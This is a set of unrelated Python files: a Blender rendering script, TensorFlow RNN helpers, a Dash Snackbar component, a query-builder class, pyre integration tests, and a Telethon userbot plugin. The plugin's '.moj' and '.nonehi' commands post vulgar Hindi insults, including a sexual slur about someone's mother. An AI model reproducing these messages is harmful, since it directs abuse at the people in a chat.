    theta_error: Any = None
    # poses of obstacles in the scene
    obstacle_poses: Any = None
    # remaining distance to the push target
    distance_to_target: Any = None
|
import asyncio
from telethon import events
from uniborg.util import admin_cmd
@borg.on(admin_cmd(pattern="moj?(.*)"))
async def _(event):
    """Animated ".moj" meme command: edits the message through a scripted
    sequence of frames with short pauses between edits."""
    # only react to plain text that is not a bot/command prefix
    if not event.text[0].isalpha() and event.text[0] not in ("/", "#", "@", "!"):
        await event.edit("RE")
        await asyncio.sleep(0.7)
        await event.edit("BHSDK")
        await asyncio.sleep(1)
        await event.edit("BETE")
        await asyncio.sleep(0.8)
        await event.edit("MOJ ")
        await asyncio.sleep(0.9)
        await event.edit("KRDI")
        await asyncio.sleep(1)
        await event.edit("TUM TO")
        await asyncio.sleep(0.8)
        await event.edit("😈")
        await asyncio.sleep(0.7)
        await event.edit("BADE HEAVY DRIVER HO BETE")
        await asyncio.sleep(1)
        # final frame with the full message
        await event.edit("😂RE BHSDK BETE MOJ KRDI TUM TO BADE HEAVY DRIVER HO🤣 ")
@borg.on(events.NewMessage(pattern=r"\.nonehi", outgoing=True))
async def _(event):
    """".nonehi" command: edits the message once, then idles."""
    # ignore forwarded messages
    if event.fwd_from:
        return
    await event.edit("bhsdk beteeeeeeesssesseeeee ma chuda")
    # long sleep keeps the handler task alive (no further action follows)
    await asyncio.sleep(999)
from userbot.cmdhelp import CmdHelp

# register the module's commands in the userbot help index
CmdHelp("lmoj").add_command("moj", None, "Its like abuse").add_command(
    "nonehi", None, "Try It"
).add()
|
import argparse
import os
import sys
import bpy
"""
blender test.blend -b -P rendering.py -- --r 512 --m normalmap --o ./normalmap.png
blender test.blend -b -P rendering.py -- --r 512 --m heightmap --o ./heightmap.png
"""
dirpath = os.path.dirname(os.path.abspath(__file__))
def render_heightmap(img_resolution: int, out_path: str) -> str:
    """Render a square grayscale height map of `img_resolution` pixels
    to `out_path` with EEVEE and return `out_path`.

    Assumes the scene "Scene", a collection "objects_for_baking", an
    object "bakescreen", and a material node named "heightmap_out" exist
    in the loaded .blend file.
    """
    bpy.context.window.scene = bpy.data.scenes["Scene"]
    bpy.ops.object.select_all(action='DESELECT')
    # Objects whose geometry we render.
    objs_collection = bpy.data.collections["objects_for_baking"].all_objects
    # Activate the required Material Output node in every object.
    for obj in objs_collection:
        for mat_slot in obj.material_slots:
            mat = mat_slot.material
            # Activate the Material Output used for the height map.
            mat.node_tree.nodes.active = mat.node_tree.nodes["heightmap_out"]
    bpy.context.scene.render.filepath = out_path
    bpy.context.scene.render.engine = 'BLENDER_EEVEE'
    # 'Standard' avoids Filmic tone mapping so height values are not remapped.
    bpy.context.scene.view_settings.view_transform = 'Standard'
    bpy.context.scene.render.image_settings.color_mode = 'BW'
    bpy.context.scene.render.resolution_y = img_resolution
    bpy.context.scene.render.resolution_x = img_resolution
    # The bake screen is only a bake target; hide it from this render.
    bpy.data.objects["bakescreen"].hide_render = True
    bpy.ops.render.render('INVOKE_DEFAULT', write_still=True)
    return out_path
def bake_normalmap(img_resolution: int, out_path: str) -> str:
    """Bake a normal map in selected-to-active mode.

    Assumes an object named `bakescreen` (with a material of the same
    name) exists; normals of the objects in the "objects_for_baking"
    collection are baked onto it. The result is saved to `out_path`,
    which is returned.
    """
    bpy.context.window.scene = bpy.data.scenes["Scene"]
    bpy.ops.object.select_all(action='DESELECT')
    # Baking requires the Cycles engine.
    bpy.context.scene.render.engine = 'CYCLES'
    # The object we bake onto.
    bakescreen_obj = bpy.data.objects["bakescreen"]
    # The objects whose geometry is baked.
    objs_collection = bpy.data.collections["objects_for_baking"].all_objects
    # Select the source objects and activate their Material Output nodes.
    for obj in objs_collection:
        obj.select_set(True)
        for mat_slot in obj.material_slots:
            mat = mat_slot.material
            # Activate the Material Output used for the normal map.
            mat.node_tree.nodes.active = mat.node_tree.nodes["normalmap_out"]
    # Sources are selected (above); make bakescreen the active object.
    bakescreen_obj.select_set(True)
    bpy.context.view_layer.objects.active = bakescreen_obj
    # Create the image that receives the bake.
    bake_img = bpy.data.images.new('bake', img_resolution, img_resolution)
    # Create an image texture node holding it and make it active,
    # so Cycles bakes into this image.
    nodes = bakescreen_obj.material_slots[0].material.node_tree.nodes
    texture_node = nodes.new('ShaderNodeTexImage')
    texture_node.select = True
    nodes.active = texture_node
    texture_node.image = bake_img
    bpy.context.scene.render.image_settings.color_mode = 'RGB'
    bpy.context.scene.render.bake.use_selected_to_active = True
    bpy.ops.object.bake(type='NORMAL', save_mode='EXTERNAL')
    bake_img.save_render(filepath=out_path)
    return out_path
# Command line: see the module docstring for example invocations.
# Each option has a long and a short-ish spelling (e.g. --resolution / --r).
parser = argparse.ArgumentParser()
parser.add_argument("--resolution", "--r", help="output image side in pixels")
parser.add_argument("--out", "--o", help="Output file path")
parser.add_argument("--map", "--m", help="heightmap or normalmap")
# Blender forwards everything after "--" to the script.
args = parser.parse_args(sys.argv[sys.argv.index("--")+1:])
if args.map == "heightmap":
    render_heightmap(int(args.resolution), os.path.abspath(args.out))
else:
    # NOTE(review): any value other than "heightmap" (including typos)
    # falls through to normal-map baking.
    bake_normalmap(int(args.resolution), os.path.abspath(args.out))
|
import tensorflow as tf
import tensorflow.contrib as tc
from tensorflow.contrib import cudnn_rnn
def nor_rnn(rnn_type, inputs, length, hidden_size, layer_num=1, dropout_keep_prob=None, concat=True):
    """Run a (possibly stacked, possibly bidirectional) RNN over `inputs`.

    Args:
        rnn_type: cell name ('lstm', 'gru', 'rnn', 'sru', 'indy' suffix);
            prefix 'bi' selects the bidirectional branch.
        inputs: batch of input sequences.
        length: per-example sequence lengths.
        hidden_size: hidden units per cell.
        layer_num: number of stacked layers.
        dropout_keep_prob: if not None, cells get input/output dropout.
        concat: NOTE(review): currently unused — bidirectional outputs are
            returned as produced, never concatenated. Confirm intent.

    Returns:
        The RNN outputs. NOTE(review): `state` is computed in every branch
        but never returned.
    """
    if not rnn_type.startswith('bi'):
        cells = tc.rnn.MultiRNNCell([get_nor_cell(rnn_type, hidden_size, dropout_keep_prob) for _ in range(layer_num)],
                                    state_is_tuple=True)
        outputs, state = tf.nn.dynamic_rnn(cells, inputs, sequence_length=length, dtype=tf.float32)
        if rnn_type.endswith('lstm'):
            # Keep only the hidden part h of the LSTM (c, h) state.
            c, h = state
            state = h
    else:
        if layer_num > 1:
            cell_fw = [get_nor_cell(rnn_type, hidden_size, dropout_keep_prob) for _ in range(layer_num)]
            cell_bw = [get_nor_cell(rnn_type, hidden_size, dropout_keep_prob) for _ in range(layer_num)]
            outputs, state_fw, state_bw = tc.rnn.stack_bidirectional_dynamic_rnn(
                cell_fw, cell_bw, inputs, sequence_length=length, dtype=tf.float32
            )
        else:
            cell_fw = get_nor_cell(rnn_type, hidden_size, dropout_keep_prob)
            cell_bw = get_nor_cell(rnn_type, hidden_size, dropout_keep_prob)
            outputs, state = tf.nn.bidirectional_dynamic_rnn(
                cell_fw, cell_bw, inputs, sequence_length=length, dtype=tf.float32
            )
    return outputs
def get_nor_cell(rnn_type, hidden_size, dropout_keep_prob=None):
    """Build a single (non-cuDNN) RNN cell chosen by the suffix of `rnn_type`.

    Args:
        rnn_type: string whose suffix selects the cell: 'lstm', 'gru',
            'rnn', 'sru', or 'indy'. Checked in this order, so e.g.
            'bilstm' also yields an LSTM cell.
        hidden_size: number of hidden units.
        dropout_keep_prob: if not None, the cell is wrapped with input and
            output dropout at this keep probability.

    Returns:
        A tf.contrib.rnn cell, possibly wrapped in DropoutWrapper.

    Raises:
        NotImplementedError: if no known suffix matches.
    """
    if rnn_type.endswith('lstm'):
        cell = tc.rnn.LSTMCell(num_units=hidden_size, state_is_tuple=True)
    elif rnn_type.endswith('gru'):
        cell = tc.rnn.GRUCell(num_units=hidden_size)
    elif rnn_type.endswith('rnn'):
        cell = tc.rnn.BasicRNNCell(num_units=hidden_size)
    elif rnn_type.endswith('sru'):
        cell = tc.rnn.SRUCell(num_units=hidden_size)
    elif rnn_type.endswith('indy'):
        cell = tc.rnn.IndyGRUCell(num_units=hidden_size)
    else:
        # Fixed typo in the error message ("Unsuported" -> "Unsupported").
        raise NotImplementedError('Unsupported rnn type: {}'.format(rnn_type))
    if dropout_keep_prob is not None:
        cell = tc.rnn.DropoutWrapper(cell,
                                     input_keep_prob=dropout_keep_prob,
                                     output_keep_prob=dropout_keep_prob)
    return cell
def cu_rnn(rnn_type, inputs, hidden_size, batch_size, layer_num=1):
    """Run a cuDNN-backed RNN over batch-major `inputs`.

    Args:
        rnn_type: cell name suffix ('lstm', 'gru', 'rnn'); prefix 'bi'
            selects a bidirectional cell.
        inputs: batch-major tensor [batch, time, dim].
        hidden_size: hidden units per layer.
        batch_size: unused; retained for backward compatibility with
            existing callers.
        layer_num: number of stacked layers.

    Returns:
        (outputs, state): batch-major outputs and the final state
        (for LSTM, only the hidden state h).
    """
    # cuDNN cells consume time-major input: [time, batch, dim].
    if not rnn_type.startswith('bi'):
        cell = get_cu_cell(rnn_type, hidden_size, layer_num, 'unidirectional')
        inputs = tf.transpose(inputs, [1, 0, 2])
        outputs, state = cell(inputs)
        if rnn_type.endswith('lstm'):
            # Keep only the hidden part h of the LSTM (c, h) state.
            c, h = state
            state = h
    else:
        cell = get_cu_cell(rnn_type, hidden_size, layer_num, 'bidirectional')
        inputs = tf.transpose(inputs, [1, 0, 2])
        outputs, state = cell(inputs)
    # Back to batch-major: [batch, time, dim].
    outputs = tf.transpose(outputs, [1, 0, 2])
    return outputs, state
def get_cu_cell(rnn_type, hidden_size, layer_num=1, direction='unidirectional'):
    """Build a cuDNN RNN chosen by the suffix of `rnn_type`.

    Args:
        rnn_type: string whose suffix selects the cell: 'lstm', 'gru',
            or 'rnn'.
        hidden_size: number of hidden units per layer.
        layer_num: number of stacked layers.
        direction: 'unidirectional' or 'bidirectional'. (The previous
            default, 'undirectional', was a typo and not a value cuDNN
            accepts; all in-file callers pass this argument explicitly.)

    Returns:
        A tf.contrib.cudnn_rnn cell.

    Raises:
        NotImplementedError: if no known suffix matches.
    """
    if rnn_type.endswith('lstm'):
        cudnn_cell = cudnn_rnn.CudnnLSTM(num_layers=layer_num, num_units=hidden_size, direction=direction,
                                         dropout=0)
    elif rnn_type.endswith('gru'):
        cudnn_cell = cudnn_rnn.CudnnGRU(num_layers=layer_num, num_units=hidden_size, direction=direction,
                                        dropout=0)
    elif rnn_type.endswith('rnn'):
        cudnn_cell = cudnn_rnn.CudnnRNNTanh(num_layers=layer_num, num_units=hidden_size, direction=direction,
                                            dropout=0)
    else:
        # Fixed typo in the error message ("Unsuported" -> "Unsupported").
        raise NotImplementedError('Unsupported rnn type: {}'.format(rnn_type))
    return cudnn_cell
def dense(inputs, hidden, use_bias=True, scope='dense', initializer=None):
    """Apply a fully connected layer to the last dimension of `inputs`.

    Args:
        inputs: tensor whose last dimension is statically known.
        hidden: output size of the layer.
        use_bias: whether to add a bias term.
        scope: variable scope name for the weights.
        initializer: initializer for the weight matrix W.

    Returns:
        Tensor with the same leading dimensions as `inputs` and last
        dimension `hidden`.
    """
    with tf.variable_scope(scope):
        shape = tf.shape(inputs)
        dim = inputs.get_shape().as_list()[-1]
        # Output shape: all leading dims of the input, plus the new last dim.
        out_shape = [shape[idx] for idx in range(len(inputs.get_shape().as_list()) - 1)] + [hidden]
        # Flatten to 2-D so a single matmul handles any input rank.
        flat_inputs = tf.reshape(inputs, [-1, dim])
        W = tf.get_variable('W', [dim, hidden], initializer=initializer)
        res = tf.matmul(flat_inputs, W)
        if use_bias:
            b = tf.get_variable('b', [hidden], initializer=tf.constant_initializer(0.))
            res = tf.nn.bias_add(res, b)
        res = tf.reshape(res, out_shape)
        return res
|
# AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
# NOTE(review): this file is auto-generated by the Dash component toolchain
# (see header). Any manual change, including comments, will be lost on
# regeneration; fix the source component instead.
class Snackbar(Component):
    """A Snackbar component.
Material UI Snackbar component

Keyword arguments:

- children (a list of or a singular dash component, string or number; optional):
    Elements to render inside the snackbar. Note that this will
    override message and actions.

- id (string; required):
    The element's ID.

- action (string; default ''):
    The text of the action button inside the snackbar. If empty, no
    action button will be added Note that this does not work with
    children.

- actionStyles (dict; optional):
    Styles to be applied to the action button.

- autoHideDuration (number; default 3000):
    The number of milliseconds to wait before automatically
    dismissing. If no value is specified the snackbar will dismiss
    normally. If a value is provided the snackbar can still be
    dismissed normally. If a snackbar is dismissed before the timer
    expires, the timer will be cleared.

- className (string; default ''):
    CSS class name of the root element.

- classes (dict; optional):
    The classes to be applied to this component. This keys in this
    object must be valid CSS rule names, and the values must be
    strings for the classnames to be assigned to each rule name Valid
    rule names are: root anchorOriginTopCenter
    anchorOriginBottomCenter anchorOriginTopRight
    anchorOriginBottomRight anchorOriginTopLeft
    anchorOriginBottomLeft.

    `classes` is a dict with keys:

    - root (string; optional)

    - anchorOriginTopCenter (string; optional)

    - anchorOriginBottomCenter (string; optional)

    - anchorOriginTopRight (string; optional)

    - anchorOriginBottomRight (string; optional)

    - anchorOriginTopLeft (string; optional)

    - anchorOriginBottomLeft (string; optional)

- message (a list of or a singular dash component, string or number; default ''):
    The message to be displayed. (Note: If the message is an element
    or array, and the Snackbar may re-render while it is still open,
    ensure that the same object remains as the message property if you
    want to avoid the Snackbar hiding and showing again). Note that
    this does not work with children.

- n_clicks (number; default 0):
    An integer that represents the number of times that action button
    has been clicked.

- open (boolean; default False):
    Controls whether the Snackbar is opened or not.

- style (dict; optional):
    Override the inline styles of the root element."""
    @_explicitize_args
    def __init__(self, children=None, action=Component.UNDEFINED, actionStyles=Component.UNDEFINED, autoHideDuration=Component.UNDEFINED, classes=Component.UNDEFINED, className=Component.UNDEFINED, fireEvent=Component.UNDEFINED, id=Component.REQUIRED, message=Component.UNDEFINED, n_clicks=Component.UNDEFINED, open=Component.UNDEFINED, style=Component.UNDEFINED, bodyStyle=Component.UNDEFINED, contentStyle=Component.UNDEFINED, **kwargs):
        self._prop_names = ['children', 'id', 'action', 'actionStyles', 'autoHideDuration', 'className', 'classes', 'message', 'n_clicks', 'open', 'style']
        self._type = 'Snackbar'
        self._namespace = 'sd_material_ui'
        self._valid_wildcard_attributes = []
        self.available_properties = ['children', 'id', 'action', 'actionStyles', 'autoHideDuration', 'className', 'classes', 'message', 'n_clicks', 'open', 'style']
        self.available_wildcard_properties = []
        # _explicit_args is injected by the @_explicitize_args decorator and
        # lists the keyword arguments the caller actually supplied.
        _explicit_args = kwargs.pop('_explicit_args')
        _locals = locals()
        _locals.update(kwargs)  # For wildcard attrs
        args = {k: _locals[k] for k in _explicit_args if k != 'children'}
        # Enforce required props at construction time.
        for k in ['id']:
            if k not in args:
                raise TypeError(
                    'Required argument `' + k + '` was not specified.')
        super(Snackbar, self).__init__(children=children, **args)
|
import string
import logging
class QueryHelper(object):
    """Builds rate-checker query dicts from the object's field attributes.

    Fields are plain strings; the sentinel value "missing" marks a field
    that should be omitted from the built query.
    """

    # Maps query-string key -> attribute name, in the order the original
    # implementation checked for the sentinel. Only the FIRST field equal
    # to "missing" is dropped from the result; any later "missing" values
    # are passed through verbatim (this preserves the legacy behavior).
    _FIELD_ORDER = (
        ('price', 'house_price'),
        ('loan_amount', 'loan_amount'),
        ('minfico', 'minfico'),
        ('maxfico', 'maxfico'),
        ('state', 'state'),
        ('rate_structure', 'rate_structure'),
        ('loan_term', 'loan_term'),
        ('loan_type', 'loan_type'),
        ('arm_type', 'arm_type'),
    )

    def __init__(self, logger, base_url):
        """Store the logger/base URL and initialize all fields to ''."""
        self.logger = logger
        self.base_url = base_url
        self.house_price = u''
        self.loan_amount = u''
        self.minfico = u''
        self.maxfico = u''
        self.state = u''
        self.rate_structure = u''
        self.loan_term = u''
        self.loan_type = u''
        self.arm_type = u''

    def build(self):
        """Return the query dict, omitting the first field whose value is
        the sentinel string "missing" (if any).

        This replaces nine near-identical branches of the original
        implementation with a single data-driven pass; the result is
        identical for every input, including multiple "missing" fields.
        """
        query_string = {key: getattr(self, attr)
                        for key, attr in self._FIELD_ORDER}
        for key, attr in self._FIELD_ORDER:
            if getattr(self, attr) == "missing":
                del query_string[key]
                break
        return query_string
|
#!/usr/bin/env python3
import glob
import json
import logging
import os
import re
import shutil
import subprocess
import tempfile
import textwrap
import unittest
from abc import ABC
from contextlib import contextmanager
from logging import Logger
from pathlib import Path
from typing import Any, Dict, Generator, List, NamedTuple, Optional, Pattern
from pyre_paths import pyre_client
LOG: Logger = logging.getLogger(__name__)
CONFIGURATION = ".pyre_configuration"
LOCAL_CONFIGURATION = ".pyre_configuration.local"
BINARY_OVERRIDE = "PYRE_BINARY"
BINARY_VERSION_PATTERN: Pattern[str] = re.compile(r"Binary version: (\w*).*")
class FilesystemError(IOError):
    """Raised when test fixtures cannot be set up (e.g. no usable pyre
    binary can be found for the project configuration)."""
    pass
class CommandData(NamedTuple):
    # One recorded pyre invocation: where it ran and the full argv used,
    # kept so failing tests can print repro instructions.
    working_directory: str
    command: List[str]
class PyreResult(NamedTuple):
    # Captured outcome of a pyre run: the command line as a string,
    # decoded stdout/stderr, and the process exit code (-1 on timeout).
    command: str
    output: Optional[str]
    error_output: Optional[str]
    return_code: int
@contextmanager
def _watch_directory(source_directory: str) -> Generator[None, None, None]:
    """Register `source_directory` with watchman for the duration of the
    with-block, and always unregister it afterwards.

    The `watch-del` call is in a finally-clause so that an exception
    raised inside the with-body no longer leaks the watchman watch
    (previously the cleanup was skipped on error).
    """
    subprocess.check_call(
        ["watchman", "watch", source_directory],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    try:
        yield
    finally:
        subprocess.check_call(
            ["watchman", "watch-del", source_directory],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
class TestCommand(unittest.TestCase, ABC):
    """Base class for pyre client integration tests.

    Manages a throwaway project directory with a fake typeshed, exposes
    helpers to build configurations/files and run pyre, and records every
    invocation so failures print full repro instructions.
    """

    directory: Path
    typeshed: Path
    command_history: List[CommandData]

    def __init__(self, methodName: str) -> None:
        super(TestCommand, self).__init__(methodName)
        # workaround for initialization type errors
        self.directory = Path(".")
        self.typeshed = Path(".")
        self.command_history = []
        if not os.environ.get("PYRE_CLIENT"):
            os.environ["PYRE_CLIENT"] = pyre_client

    def setUp(self) -> None:
        # Fresh scratch project per test; deleted again in tearDown.
        self.directory = Path(tempfile.mkdtemp())
        self.typeshed = Path(self.directory, "fake_typeshed")
        self.buck_config = Path(self.directory, ".buckconfig").touch()
        Path(self.typeshed, "stdlib").mkdir(parents=True)
        self.initial_filesystem()

    def tearDown(self) -> None:
        self.cleanup()
        self.command_history = []
        shutil.rmtree(self.directory)

    def initial_filesystem(self) -> None:
        # Hook: subclasses create their starting files/configurations here.
        pass

    def cleanup(self) -> None:
        # Hook: subclasses stop servers / release resources here.
        pass

    def create_project_configuration(
        self, root: Optional[str] = None, contents: Optional[Dict[str, Any]] = None
    ) -> None:
        """Write a .pyre_configuration under `root` (default: test dir).

        When no contents are given, choose a binary in this order:
        the PYRE_BINARY override, the published `pyre --version` binary,
        or a local `pyre.bin`; raise FilesystemError if none is found.
        """
        root: Path = Path(root) if root else self.directory
        configuration_path = root / CONFIGURATION
        if not contents:
            # Use binary override if it is built.
            binary_override = os.environ.get(BINARY_OVERRIDE)
            # TODO(T57341910): Set binary override in buck test.
            if binary_override:
                contents = {"version": "$BINARY_OVERRIDE"}
            else:
                # Default to published binary version.
                output = subprocess.run(
                    ["pyre", "--version"], capture_output=True
                ).stdout.decode()
                output_match = re.match(BINARY_VERSION_PATTERN, output)
                version = output_match.group(1) if output_match else None
                if version and version != "No":
                    contents = {"version": version, "use_buck_builder": True}
                else:
                    binary_location = shutil.which("pyre.bin")
                    if binary_location is None:
                        LOG.error(
                            "No project configuration content provided and "
                            "could not find a binary to run."
                        )
                        raise FilesystemError
                    contents = {"binary": binary_location}
        with configuration_path.open("w+") as configuration_file:
            json.dump(contents, configuration_file)

    def create_local_configuration(self, root: str, contents: Dict[str, Any]) -> None:
        # Write a .pyre_configuration.local for the sub-project `root`.
        root: Path = self.directory / root
        root.mkdir(exist_ok=True)
        with (root / LOCAL_CONFIGURATION).open("w+") as configuration_file:
            json.dump(contents, configuration_file)

    def create_directory(self, relative_path: str) -> None:
        Path(self.directory, relative_path).mkdir(parents=True)

    def create_file(self, relative_path: str, contents: str = "") -> None:
        # Contents are dedented, so callers can use indented triple-quoted
        # literals.
        file_path = self.directory / relative_path
        file_path.parent.mkdir(exist_ok=True, parents=True)
        file_path.write_text(textwrap.dedent(contents))

    def create_file_with_error(self, relative_path: str) -> None:
        # Returning an int where `str` is declared yields exactly one
        # pyre type error in this file.
        contents = """
            def foo(x: int) -> str:
                return x
            """
        self.create_file(relative_path, contents)

    def delete_file(self, relative_path: str) -> None:
        try:
            (self.directory / relative_path).unlink()
        except FileNotFoundError:
            LOG.debug(
                "Deletion of {} skipped; file does not exist.".format(relative_path)
            )

    def run_pyre(
        self,
        command: str,
        *arguments: str,
        working_directory: Optional[str] = None,
        timeout: int = 30,
        prompts: Optional[List[str]] = None
    ) -> PyreResult:
        """Run `pyre <command> <arguments>` in the scratch project.

        `prompts` are fed to stdin (newline-joined) for interactive
        commands. Records the invocation in command_history, and on
        timeout logs the failure context before re-raising.
        """
        working_directory: Path = (
            self.directory / working_directory if working_directory else self.directory
        )
        prompt_inputs = "\n".join(prompts).encode() if prompts else None
        # TODO(T60769864): Consider building shim if it exists.
        command: List[str] = [
            "pyre",
            "--noninteractive",
            "--output=json",
            "--typeshed",
            str(self.typeshed),
            command,
            *arguments,
        ]
        try:
            self.command_history.append(CommandData(str(working_directory), command))
            process = subprocess.run(
                command,
                cwd=working_directory,
                input=prompt_inputs,
                timeout=timeout,
                capture_output=True,
            )
            return PyreResult(
                " ".join(command),
                process.stdout.decode(),
                process.stderr.decode(),
                process.returncode,
            )
        except subprocess.TimeoutExpired as error:
            stdout = error.stdout
            stderr = error.stderr
            # Return code -1 marks a timed-out run in the logged context.
            result = PyreResult(
                " ".join(command),
                stdout.decode() if stdout else "",
                stderr.decode() if stderr else "",
                -1,
            )
            LOG.error(self.get_context(result))
            raise error

    def get_servers(self) -> List[Dict[str, Any]]:
        """Return the running pyre servers as parsed JSON."""
        result = self.run_pyre("--output=json", "servers")
        try:
            running_servers = json.loads(result.output or "")
        except json.JSONDecodeError as json_error:
            LOG.error(self.get_context(result))
            raise json_error
        return running_servers

    def get_context(self, result: Optional[PyreResult] = None) -> str:
        """Build a human-readable failure report: pyre output, filesystem
        tree, version information, and repro instructions."""
        # TODO(T60769864): Avoid printing context twice in buck runs.
        # TODO(T57341910): Log pyre rage / debug when appropriate.
        context = ""

        def format_section(title: str, *contents: str) -> str:
            # Render one titled section of the report.
            divider = "=" * 15
            # pyre-ignore[9]: Unable to unpack `str`, expected a tuple.
            contents = "\n\n".join([content.strip() for content in contents])
            section = "\n\n{} {} {}\n\n{}\n".format(divider, title, divider, contents)
            return section

        # Pyre Output
        if result:
            if result.output or result.error_output:
                context += format_section(
                    "Pyre Output",
                    "Command: `" + result.command + "`",
                    result.output or "",
                    result.error_output or "",
                )

        # Filesystem Structure
        filesystem_structure = subprocess.run(
            ["tree", self.directory, "-a", "-I", "typeshed"], capture_output=True
        ).stdout.decode()
        context += format_section("Filesystem Structure", filesystem_structure)

        # Version Information
        version_output = subprocess.run(
            ["pyre", "--version"], cwd=self.directory, capture_output=True
        ).stdout.decode()
        configurations = glob.glob(
            str(self.directory / "**/.pyre_configuration*"), recursive=True
        )
        configuration_contents = ""
        for configuration in configurations:
            configuration_contents += configuration + "\n "
            configuration_contents += Path(configuration).read_text() + "\n\n"
        context += format_section("Versioning", version_output, configuration_contents)

        # Repro Instructions
        instructions = ""
        if self.command_history:
            instructions += "- Create directory structure above and run:\n\t"
            instructions += "\n\t".join(
                [
                    "["
                    + str(command.working_directory).replace(
                        str(self.directory), "$project_root"
                    )
                    + "] "
                    + " ".join(command.command)
                    for command in self.command_history
                ]
            )
        test_id = self.id()
        instructions += "\n\n- Re-run only this failing test:\n\t"
        instructions += "[tools/pyre] python3 {} {}".format(
            "scripts/run_client_integration_test.py", test_id
        )
        instructions += "\n\n- Flaky? Stress test this failing test:\n\t"
        test_target = "//tools/pyre/scripts:pyre_client_integration_test_runner"
        buck_arguments = "--jobs 18 --stress-runs 20 --record-results"
        test_name = test_id.split(".")[-1]
        test_qualifier = r"\.".join(test_id.split(".")[:-1])
        instructions += r"[tools/pyre] buck test {} -- '{} \({}\)' {}".format(
            test_target, test_name, test_qualifier, buck_arguments
        )
        context += format_section("Repro Instructions", instructions)

        return context

    def assert_succeeded(self, result: PyreResult) -> None:
        # Exit code 0 means the command completed without reporting errors.
        self.assertEqual(result.return_code, 0, self.get_context(result))

    def assert_failed(self, result: PyreResult) -> None:
        # Exit code 2 is used for client-level failures (see usage in
        # CheckTest.test_command_line_source_directory_check).
        self.assertEqual(result.return_code, 2, self.get_context(result))

    def assert_output_matches(
        self, result: PyreResult, expected_pattern: Pattern[str]
    ) -> None:
        output = result.output or ""
        result_match = re.match(expected_pattern, output.strip())
        self.assertTrue(result_match is not None, self.get_context(result))

    def assert_has_errors(self, result: PyreResult) -> None:
        # Exit code 1: the check ran and found type errors.
        self.assertEqual(result.return_code, 1, self.get_context(result))

    def assert_no_errors(self, result: PyreResult) -> None:
        self.assertEqual(result.return_code, 0, self.get_context(result))

    def assert_file_exists(
        self, relative_path: str, json_contents: Optional[Dict[str, Any]] = None
    ) -> None:
        # Optionally also compare the file's parsed JSON contents.
        file_path = self.directory / relative_path
        self.assertTrue(file_path.exists(), self.get_context())
        if json_contents:
            file_contents = file_path.read_text()
            self.assertEqual(
                json.loads(file_contents), json_contents, self.get_context()
            )

    def assert_server_exists(
        self, server_name: str, result: Optional[PyreResult] = None
    ) -> None:
        running_servers = self.get_servers()
        server_exists = any(server["name"] == server_name for server in running_servers)
        self.assertTrue(server_exists, self.get_context(result))

    def assert_server_does_not_exist(
        self, server_name: str, result: Optional[PyreResult] = None
    ) -> None:
        running_servers = self.get_servers()
        server_exists = any(server["name"] == server_name for server in running_servers)
        self.assertFalse(server_exists, self.get_context(result))

    def assert_no_servers_exist(self, result: Optional[PyreResult] = None) -> None:
        self.assertEqual(self.get_servers(), [], self.get_context(result))
class BaseCommandTest(TestCommand):
    """Placeholder for command-agnostic tests."""
    # TODO(T57341910): Test command-agnostic behavior like `pyre --version`
    pass
class AnalyzeTest(TestCommand):
    """Placeholder for `pyre analyze` tests."""
    # TODO(T57341910): Fill in test cases
    # Currently fails with invalid model error.
    pass
class CheckTest(TestCommand):
    """Tests for `pyre check`."""

    def initial_filesystem(self) -> None:
        self.create_project_configuration()
        self.create_file_with_error("local_project/has_type_error.py")

    def test_command_line_source_directory_check(self) -> None:
        # --source-directory works without a local configuration...
        result = self.run_pyre("--source-directory", "local_project", "check")
        self.assert_has_errors(result)
        # ...but -l requires one, so this invocation fails.
        result = self.run_pyre("-l", "local_project", "check")
        self.assert_failed(result)

    def test_command_line_targets_check(self) -> None:
        pass

    def test_local_configuration_check(self) -> None:
        self.create_local_configuration("local_project", {"source_directories": ["."]})
        result = self.run_pyre("-l", "local_project", "check")
        self.assert_has_errors(result)
class ColorTest(TestCommand):
    """Placeholder for `pyre color` tests."""
    # TODO(T57341910): Fill in test cases.
    # pyre -l project path current fails with server connection failure.
    pass
class DeobfuscateTest(TestCommand):
    """Placeholder for `pyre deobfuscate` tests."""
    # TODO(T57341910): Fill in test cases.
    # Currently fails with error parsing command line, no help.
    pass
class IncrementalTest(TestCommand):
    """Tests for `pyre incremental`."""

    def cleanup(self) -> None:
        # Incremental runs start servers; kill them between tests.
        self.run_pyre("kill")

    def initial_filesystem(self) -> None:
        self.create_project_configuration()
        self.create_directory("local_project")
        self.create_local_configuration("local_project", {"source_directories": ["."]})
        self.create_file_with_error("local_project/has_type_error.py")
        # Empty watchman configuration at the project root.
        self.create_file(".watchmanconfig", "{}")

    def test_no_existing_server(self) -> None:
        result = self.run_pyre(
            "-l", "local_project", "incremental", "--incremental-style=fine_grained"
        )
        self.assert_has_errors(result)
class InferTest(TestCommand):
    """Tests for `pyre infer`."""

    def initial_filesystem(self) -> None:
        self.create_project_configuration()
        self.create_local_configuration("local_project", {"source_directories": ["."]})
        # An unannotated function for infer to produce a stub for.
        contents = """
            def foo():
                return 1
            """
        self.create_file("local_project/missing_annotation.py", contents)

    def test_infer_stubs(self) -> None:
        self.run_pyre("-l", "local_project", "infer")
        self.assert_file_exists(
            ".pyre/local_project/types/local_project/missing_annotation.pyi"
        )

    def test_infer_in_place(self) -> None:
        pass

    def test_infer_from_existing_stubs(self) -> None:
        pass

    def test_infer_from_json(self) -> None:
        pass

    def test_infer_options(self) -> None:
        # print-only, full-only, recursive
        pass
class InitializeTest(TestCommand):
    """Tests for `pyre init`, driving its interactive prompts via stdin."""

    def initial_filesystem(self) -> None:
        self.create_file("fake_pyre.bin")

    # TODO(T57341910): Make prompting explicit, test conditions that skip prompts.
    def test_initialize_project_configuration(self) -> None:
        with _watch_directory(self.directory):
            self.run_pyre(
                "init",
                prompts=["y", "fake_pyre.bin", "fake_typeshed", "//example:target"],
            )
            expected_contents = {
                "binary": str(self.directory / "fake_pyre.bin"),
                "source_directories": ["//example:target"],
                "typeshed": str(self.directory / "fake_typeshed"),
            }
            self.assert_file_exists(
                ".pyre_configuration", json_contents=expected_contents
            )

    def test_initialize_local_configuration(self) -> None:
        self.create_directory("local_project")
        with _watch_directory(self.directory):
            self.run_pyre(
                "init",
                "--local",
                working_directory="local_project",
                prompts=["Y", "//example:target", "Y", "Y", "Y"],
            )
            expected_contents = {
                "differential": True,
                "push_blocking": True,
